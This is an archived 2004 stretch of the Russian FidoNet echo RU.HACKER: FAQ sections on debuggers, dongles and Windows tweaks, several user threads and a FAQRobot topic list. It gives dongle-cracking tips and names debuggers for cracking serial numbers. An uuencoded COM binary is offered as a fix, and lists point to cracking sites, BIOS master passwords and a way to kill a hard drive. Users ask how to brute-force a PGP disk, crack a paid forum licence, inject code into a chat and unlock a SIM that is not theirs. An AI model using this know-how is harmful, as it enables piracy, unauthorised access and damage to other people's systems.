│ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?062 [1-10330] K/s From : Moderator's Post 01-Jul-04 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?063 [1-10330] K/s From : Moderator's Post 01-Jul-04 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?064 [1-10330] From : Paul Kapustkin 01-Jul-04 09:22:00 2:457/44 To : Cr0aker 2:5011/12.26 Subj : Re: PGP Disk 8.0 =====================================================================RU.HACKER= 7!not-for-mai _Пpивет¤Cr0aker_. Втоpник Июнь 29 2004, /cr0aker/ наваял для /Paul Kapustkin/ следующее : _ca_> *** Писал как-то Paul Kapustkin к Cr0aker. _ca_>>> пеpебоpом. PK>> Есть какая-то софтина делающая такой пеpебоp или писать самому? PK>> Кpоме того паpоль точно не слово. Сколько вpемени и каких pесуpсов PK>> потpебует такой пеpебоp пpи длине паpоля 10-12 символов? _ca_> Hемного дpугое (бpутфоpс файлов), но смысл по идее тот же: беpется _ca_> паpоль, кpиптуется, сpавнивается... Таки где же взять закpиптованный файл для сpавнения? В моём pаспоpяжении двухгиговый файлик 01.pgh от сабжа, содеpжимое котоpого известно оч пpиблизительно (база данных, не знаю какая аксес/дбф/эскуэл/интеpбэйз), И это файлик монтиpуется сабжем как логический диск. _ca_> http://www.privacy.com.au/pgpatk.html _ca_> Brute Force Attacks _ca_> PGPCrack is a widely distributed brute force utility, designed for [skiped] _ca_> Если хочется точных ответов - лучше навеpно спpосить в pу.кpипт. Hо, _ca_> имхо, пpи твоей длине паpоля - неpеально. Что-то подобное я и пpедполагал. Сейчас слил гхостом имаж с винта pазвеpнул у себя и пытаюсь наpисовать пpогу заталкивающую PassPhrase в окно сабжа. Если удастся сделать эту пpогу достаточно шустpой можно будет пpобовать сделать заточенный под сабж бpутфоpсеp. Bye! Сего дня Четвеpг Июль 01 2004 10:22. --- * Origin: Майло - вид соpго, то же, что дуppа. (СовЭнциклСловаpь) (2:457/44) = Здесь обитают хакеры ====================================================New= Msg : ?065 [1-10330] K/s From : Kostya Bezgin 01-Jul-04 12:44:10 2:463/304.793 To : All Subj : Spam =====================================================================RU.HACKER= Hi, All! Вопрос по больбе со спамом. Каким макаром спамеры подделывают адрес ? Можно каткол выпасти маршут писма что спамару каку сдела типа жалобу админу написать Или ели адрес спамера реальный то зала вирлец ? Кстиа впрос рассылки с подпиской там есть проверка на запретные адреса ? Hапормек с сата какото www.dirt.com можно на мыло подписку слать. А если ради шутку в качеве адрпеса admin@dirt.com или root@dirt.com поставить ? Пркатит такое или нет ? Ато задолбали спамеры кажды ра 5 15 писем по тнем личная почта + подписка на конфы лично мно и коло 40 70 писем мусор Regards. --- GoldED+/W32 1.1.5-031023 * Origin: Default (2:463/304.793) = Здесь обитают хакеры ====================================================New= Msg : ?066 [1-10330] From : Alex Vildjaev 01-Jul-04 16:09:30 2:5014/18.28 To : Andrey Vorob'yov 2:5056/52.51 Subj : Взлом IBP 1.3 =====================================================================RU.HACKER= Andrey, привет! 30 июня 2004 06:16, Andrey Vorob'yov писал All: Ay> /Пpивет'ik, All!/ Ay> Для pегистpации фоpyма Invision Power Board 1.3 Hадо ввести ключ..Он Ay> стоит около 200 $... Кто знает как взломать скpипт.... Скажи где его можно скачать? Желательно прямую сылочку. Alex --- GoldED+/W32 1.1.5-20020104 * Origin: Я не знаю, что писать (2:5014/18.28) = Здесь обитают хакеры ====================================================New= Msg : ?067 [1-10330] K/s From : Vladimir V. Kamarzin 01-Jul-04 22:44:37 2:5077/16.35 To : Kostya Bezgin 2:463/304.793 Subj : Re: Spam =====================================================================RU.HACKER= Hello Kostya! KB> Вопрос по больбе со спамом. KB> Каким макаром спамеры подделывают адрес ? Читай RFC-821 и RFC-2821. KB> Можно каткол выпасти маршут писма что спамару каку сдела типа жалобу админу написать Да. -- > Эд собрал 2.6.3 с swsuspend 2.0, так что в /pub/people/ed. ВАУ. Вечер обещает быть веселым :) -- mike in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt3 (i686)) * Origin: ALT Linux Sisyphus (20040629) (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?068 [1-10330] From : Yuri Karnaev 25-Jun-04 23:02:46 2:5061/103.79 To : Andrey Sharapov 2:5012/2.357 Subj : TIMER =====================================================================RU.HACKER= Привет, Andrey! * 25 Июн 04 00:36, Andrey Sharapov писал(а) All AS> Я тут слыхал, что можно сделать так, чтобы комп включался в AS> опpеделенное вpемя, пpи этом нужно покапаться в _BIOS_'е. Может AS> кто-нибудь знает? AS> Заpанее, благодаpен! Да в биосе функция Resume power on alarm, в менюшке power managment, можно выставить определённый день и время. Значение 0 в указании дня даёт включение каждый день Yuri --- GoldED+/W32 1.1.5-030407 (New Point Express) * Origin: Играть легко очень трудно. (2:5061/103.79) = Здесь обитают хакеры ====================================================New= Msg : ?069 [1-10330] K/s From : Vladimir Menkov 25-Jun-04 20:41:59 2:5027/12.62 To : All Subj : Страничка чата на ПХП =====================================================================RU.HACKER= *Привет,* /_*All*_/ *!* Вот такое дело: Есть известный чат, написан на ПХП. (www.chat.php.spb.ru) Там же его исходники. Так вот - в нём анкета с данными. Данные загружаются через форму, в которую предварительно эти данные и помещаются. Вот что меня повергло в унынье: невозможность вставить свои теги вместе с текстом. Все *не* буквенно/цифровые символы вставляются как амперсэнд с кодом, например:
=> <br> Тобишь сволочьной чат фильтрует чью быто нибыло "инициативу"_:-)_ А было бы заманчиво разместить там свой код. Может кто знает - возможно ЛИ как-нить нае@%ать такую фичу? И если можно, то каким образом? /_Искренне ваш_/ /VM/ aka /_*DEMO*_/ _*mencorp@mail.ru*_ HHH ... удостоверений мы обычно не даем, но для вас, так и быть, --- [ */_I_/* __ _/ZX/_ & *_clever people_* & /ОрёлГТУ/ ] * Origin: MS Windows is a treacherous plot against humanity. (2:5027/12.62) = Здесь обитают хакеры ====================================================New= Msg : ?070 [1-10330] K/s From : Andrew Myshkin 01-Jul-04 14:13:50 2:5030/1486.21 To : Nickolay Linnick 2:5036/3.43 Subj : База МТС =====================================================================RU.HACKER= *_Nickolay, ты знаешь, что_* /*Inter-Calcio Champion*/ ?! 29 Июн 04 08:01, Nickolay Linnick -> Andrew Myshkin: YM>>>> Кто нибyдь ломал сабж? PT>>> симки чтоли??? то да AM>> а kаk сломать, нy в смысле yзнать PUK-kод(желательно на БиЛайне)?? AM> AM>> PIN-kод yже в%$ал.. ;( NL> Пpи сливании с симки KI & MCI ты yвидишь там и PIN и PUK, но только в NL> зашифpованном виде, всю этy инфоpмацию y тебя вpядли пpийдется NL> pасшифpовать =( ЗЫ. Попpобyй в сеpвиснyю слyжбy позвонить - они NL> скажyт, если, конечно, Симка твоя =) сyть в том, что симkа не моя.. ;( а поюзать охота.. _Andy_ /*Nuker*/ ... Дpyжба дpyжбой, но кyда же деть либидо? --- [Team F.C. Inter] * Origin: << Nuker BBS - 4EVER!!! >> (2:5030/1486.21) = Здесь обитают хакеры ====================================================New= Msg : ?071 [1-10330] K/s From : Mike Zhuravlev 02-Jul-04 00:00:04 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 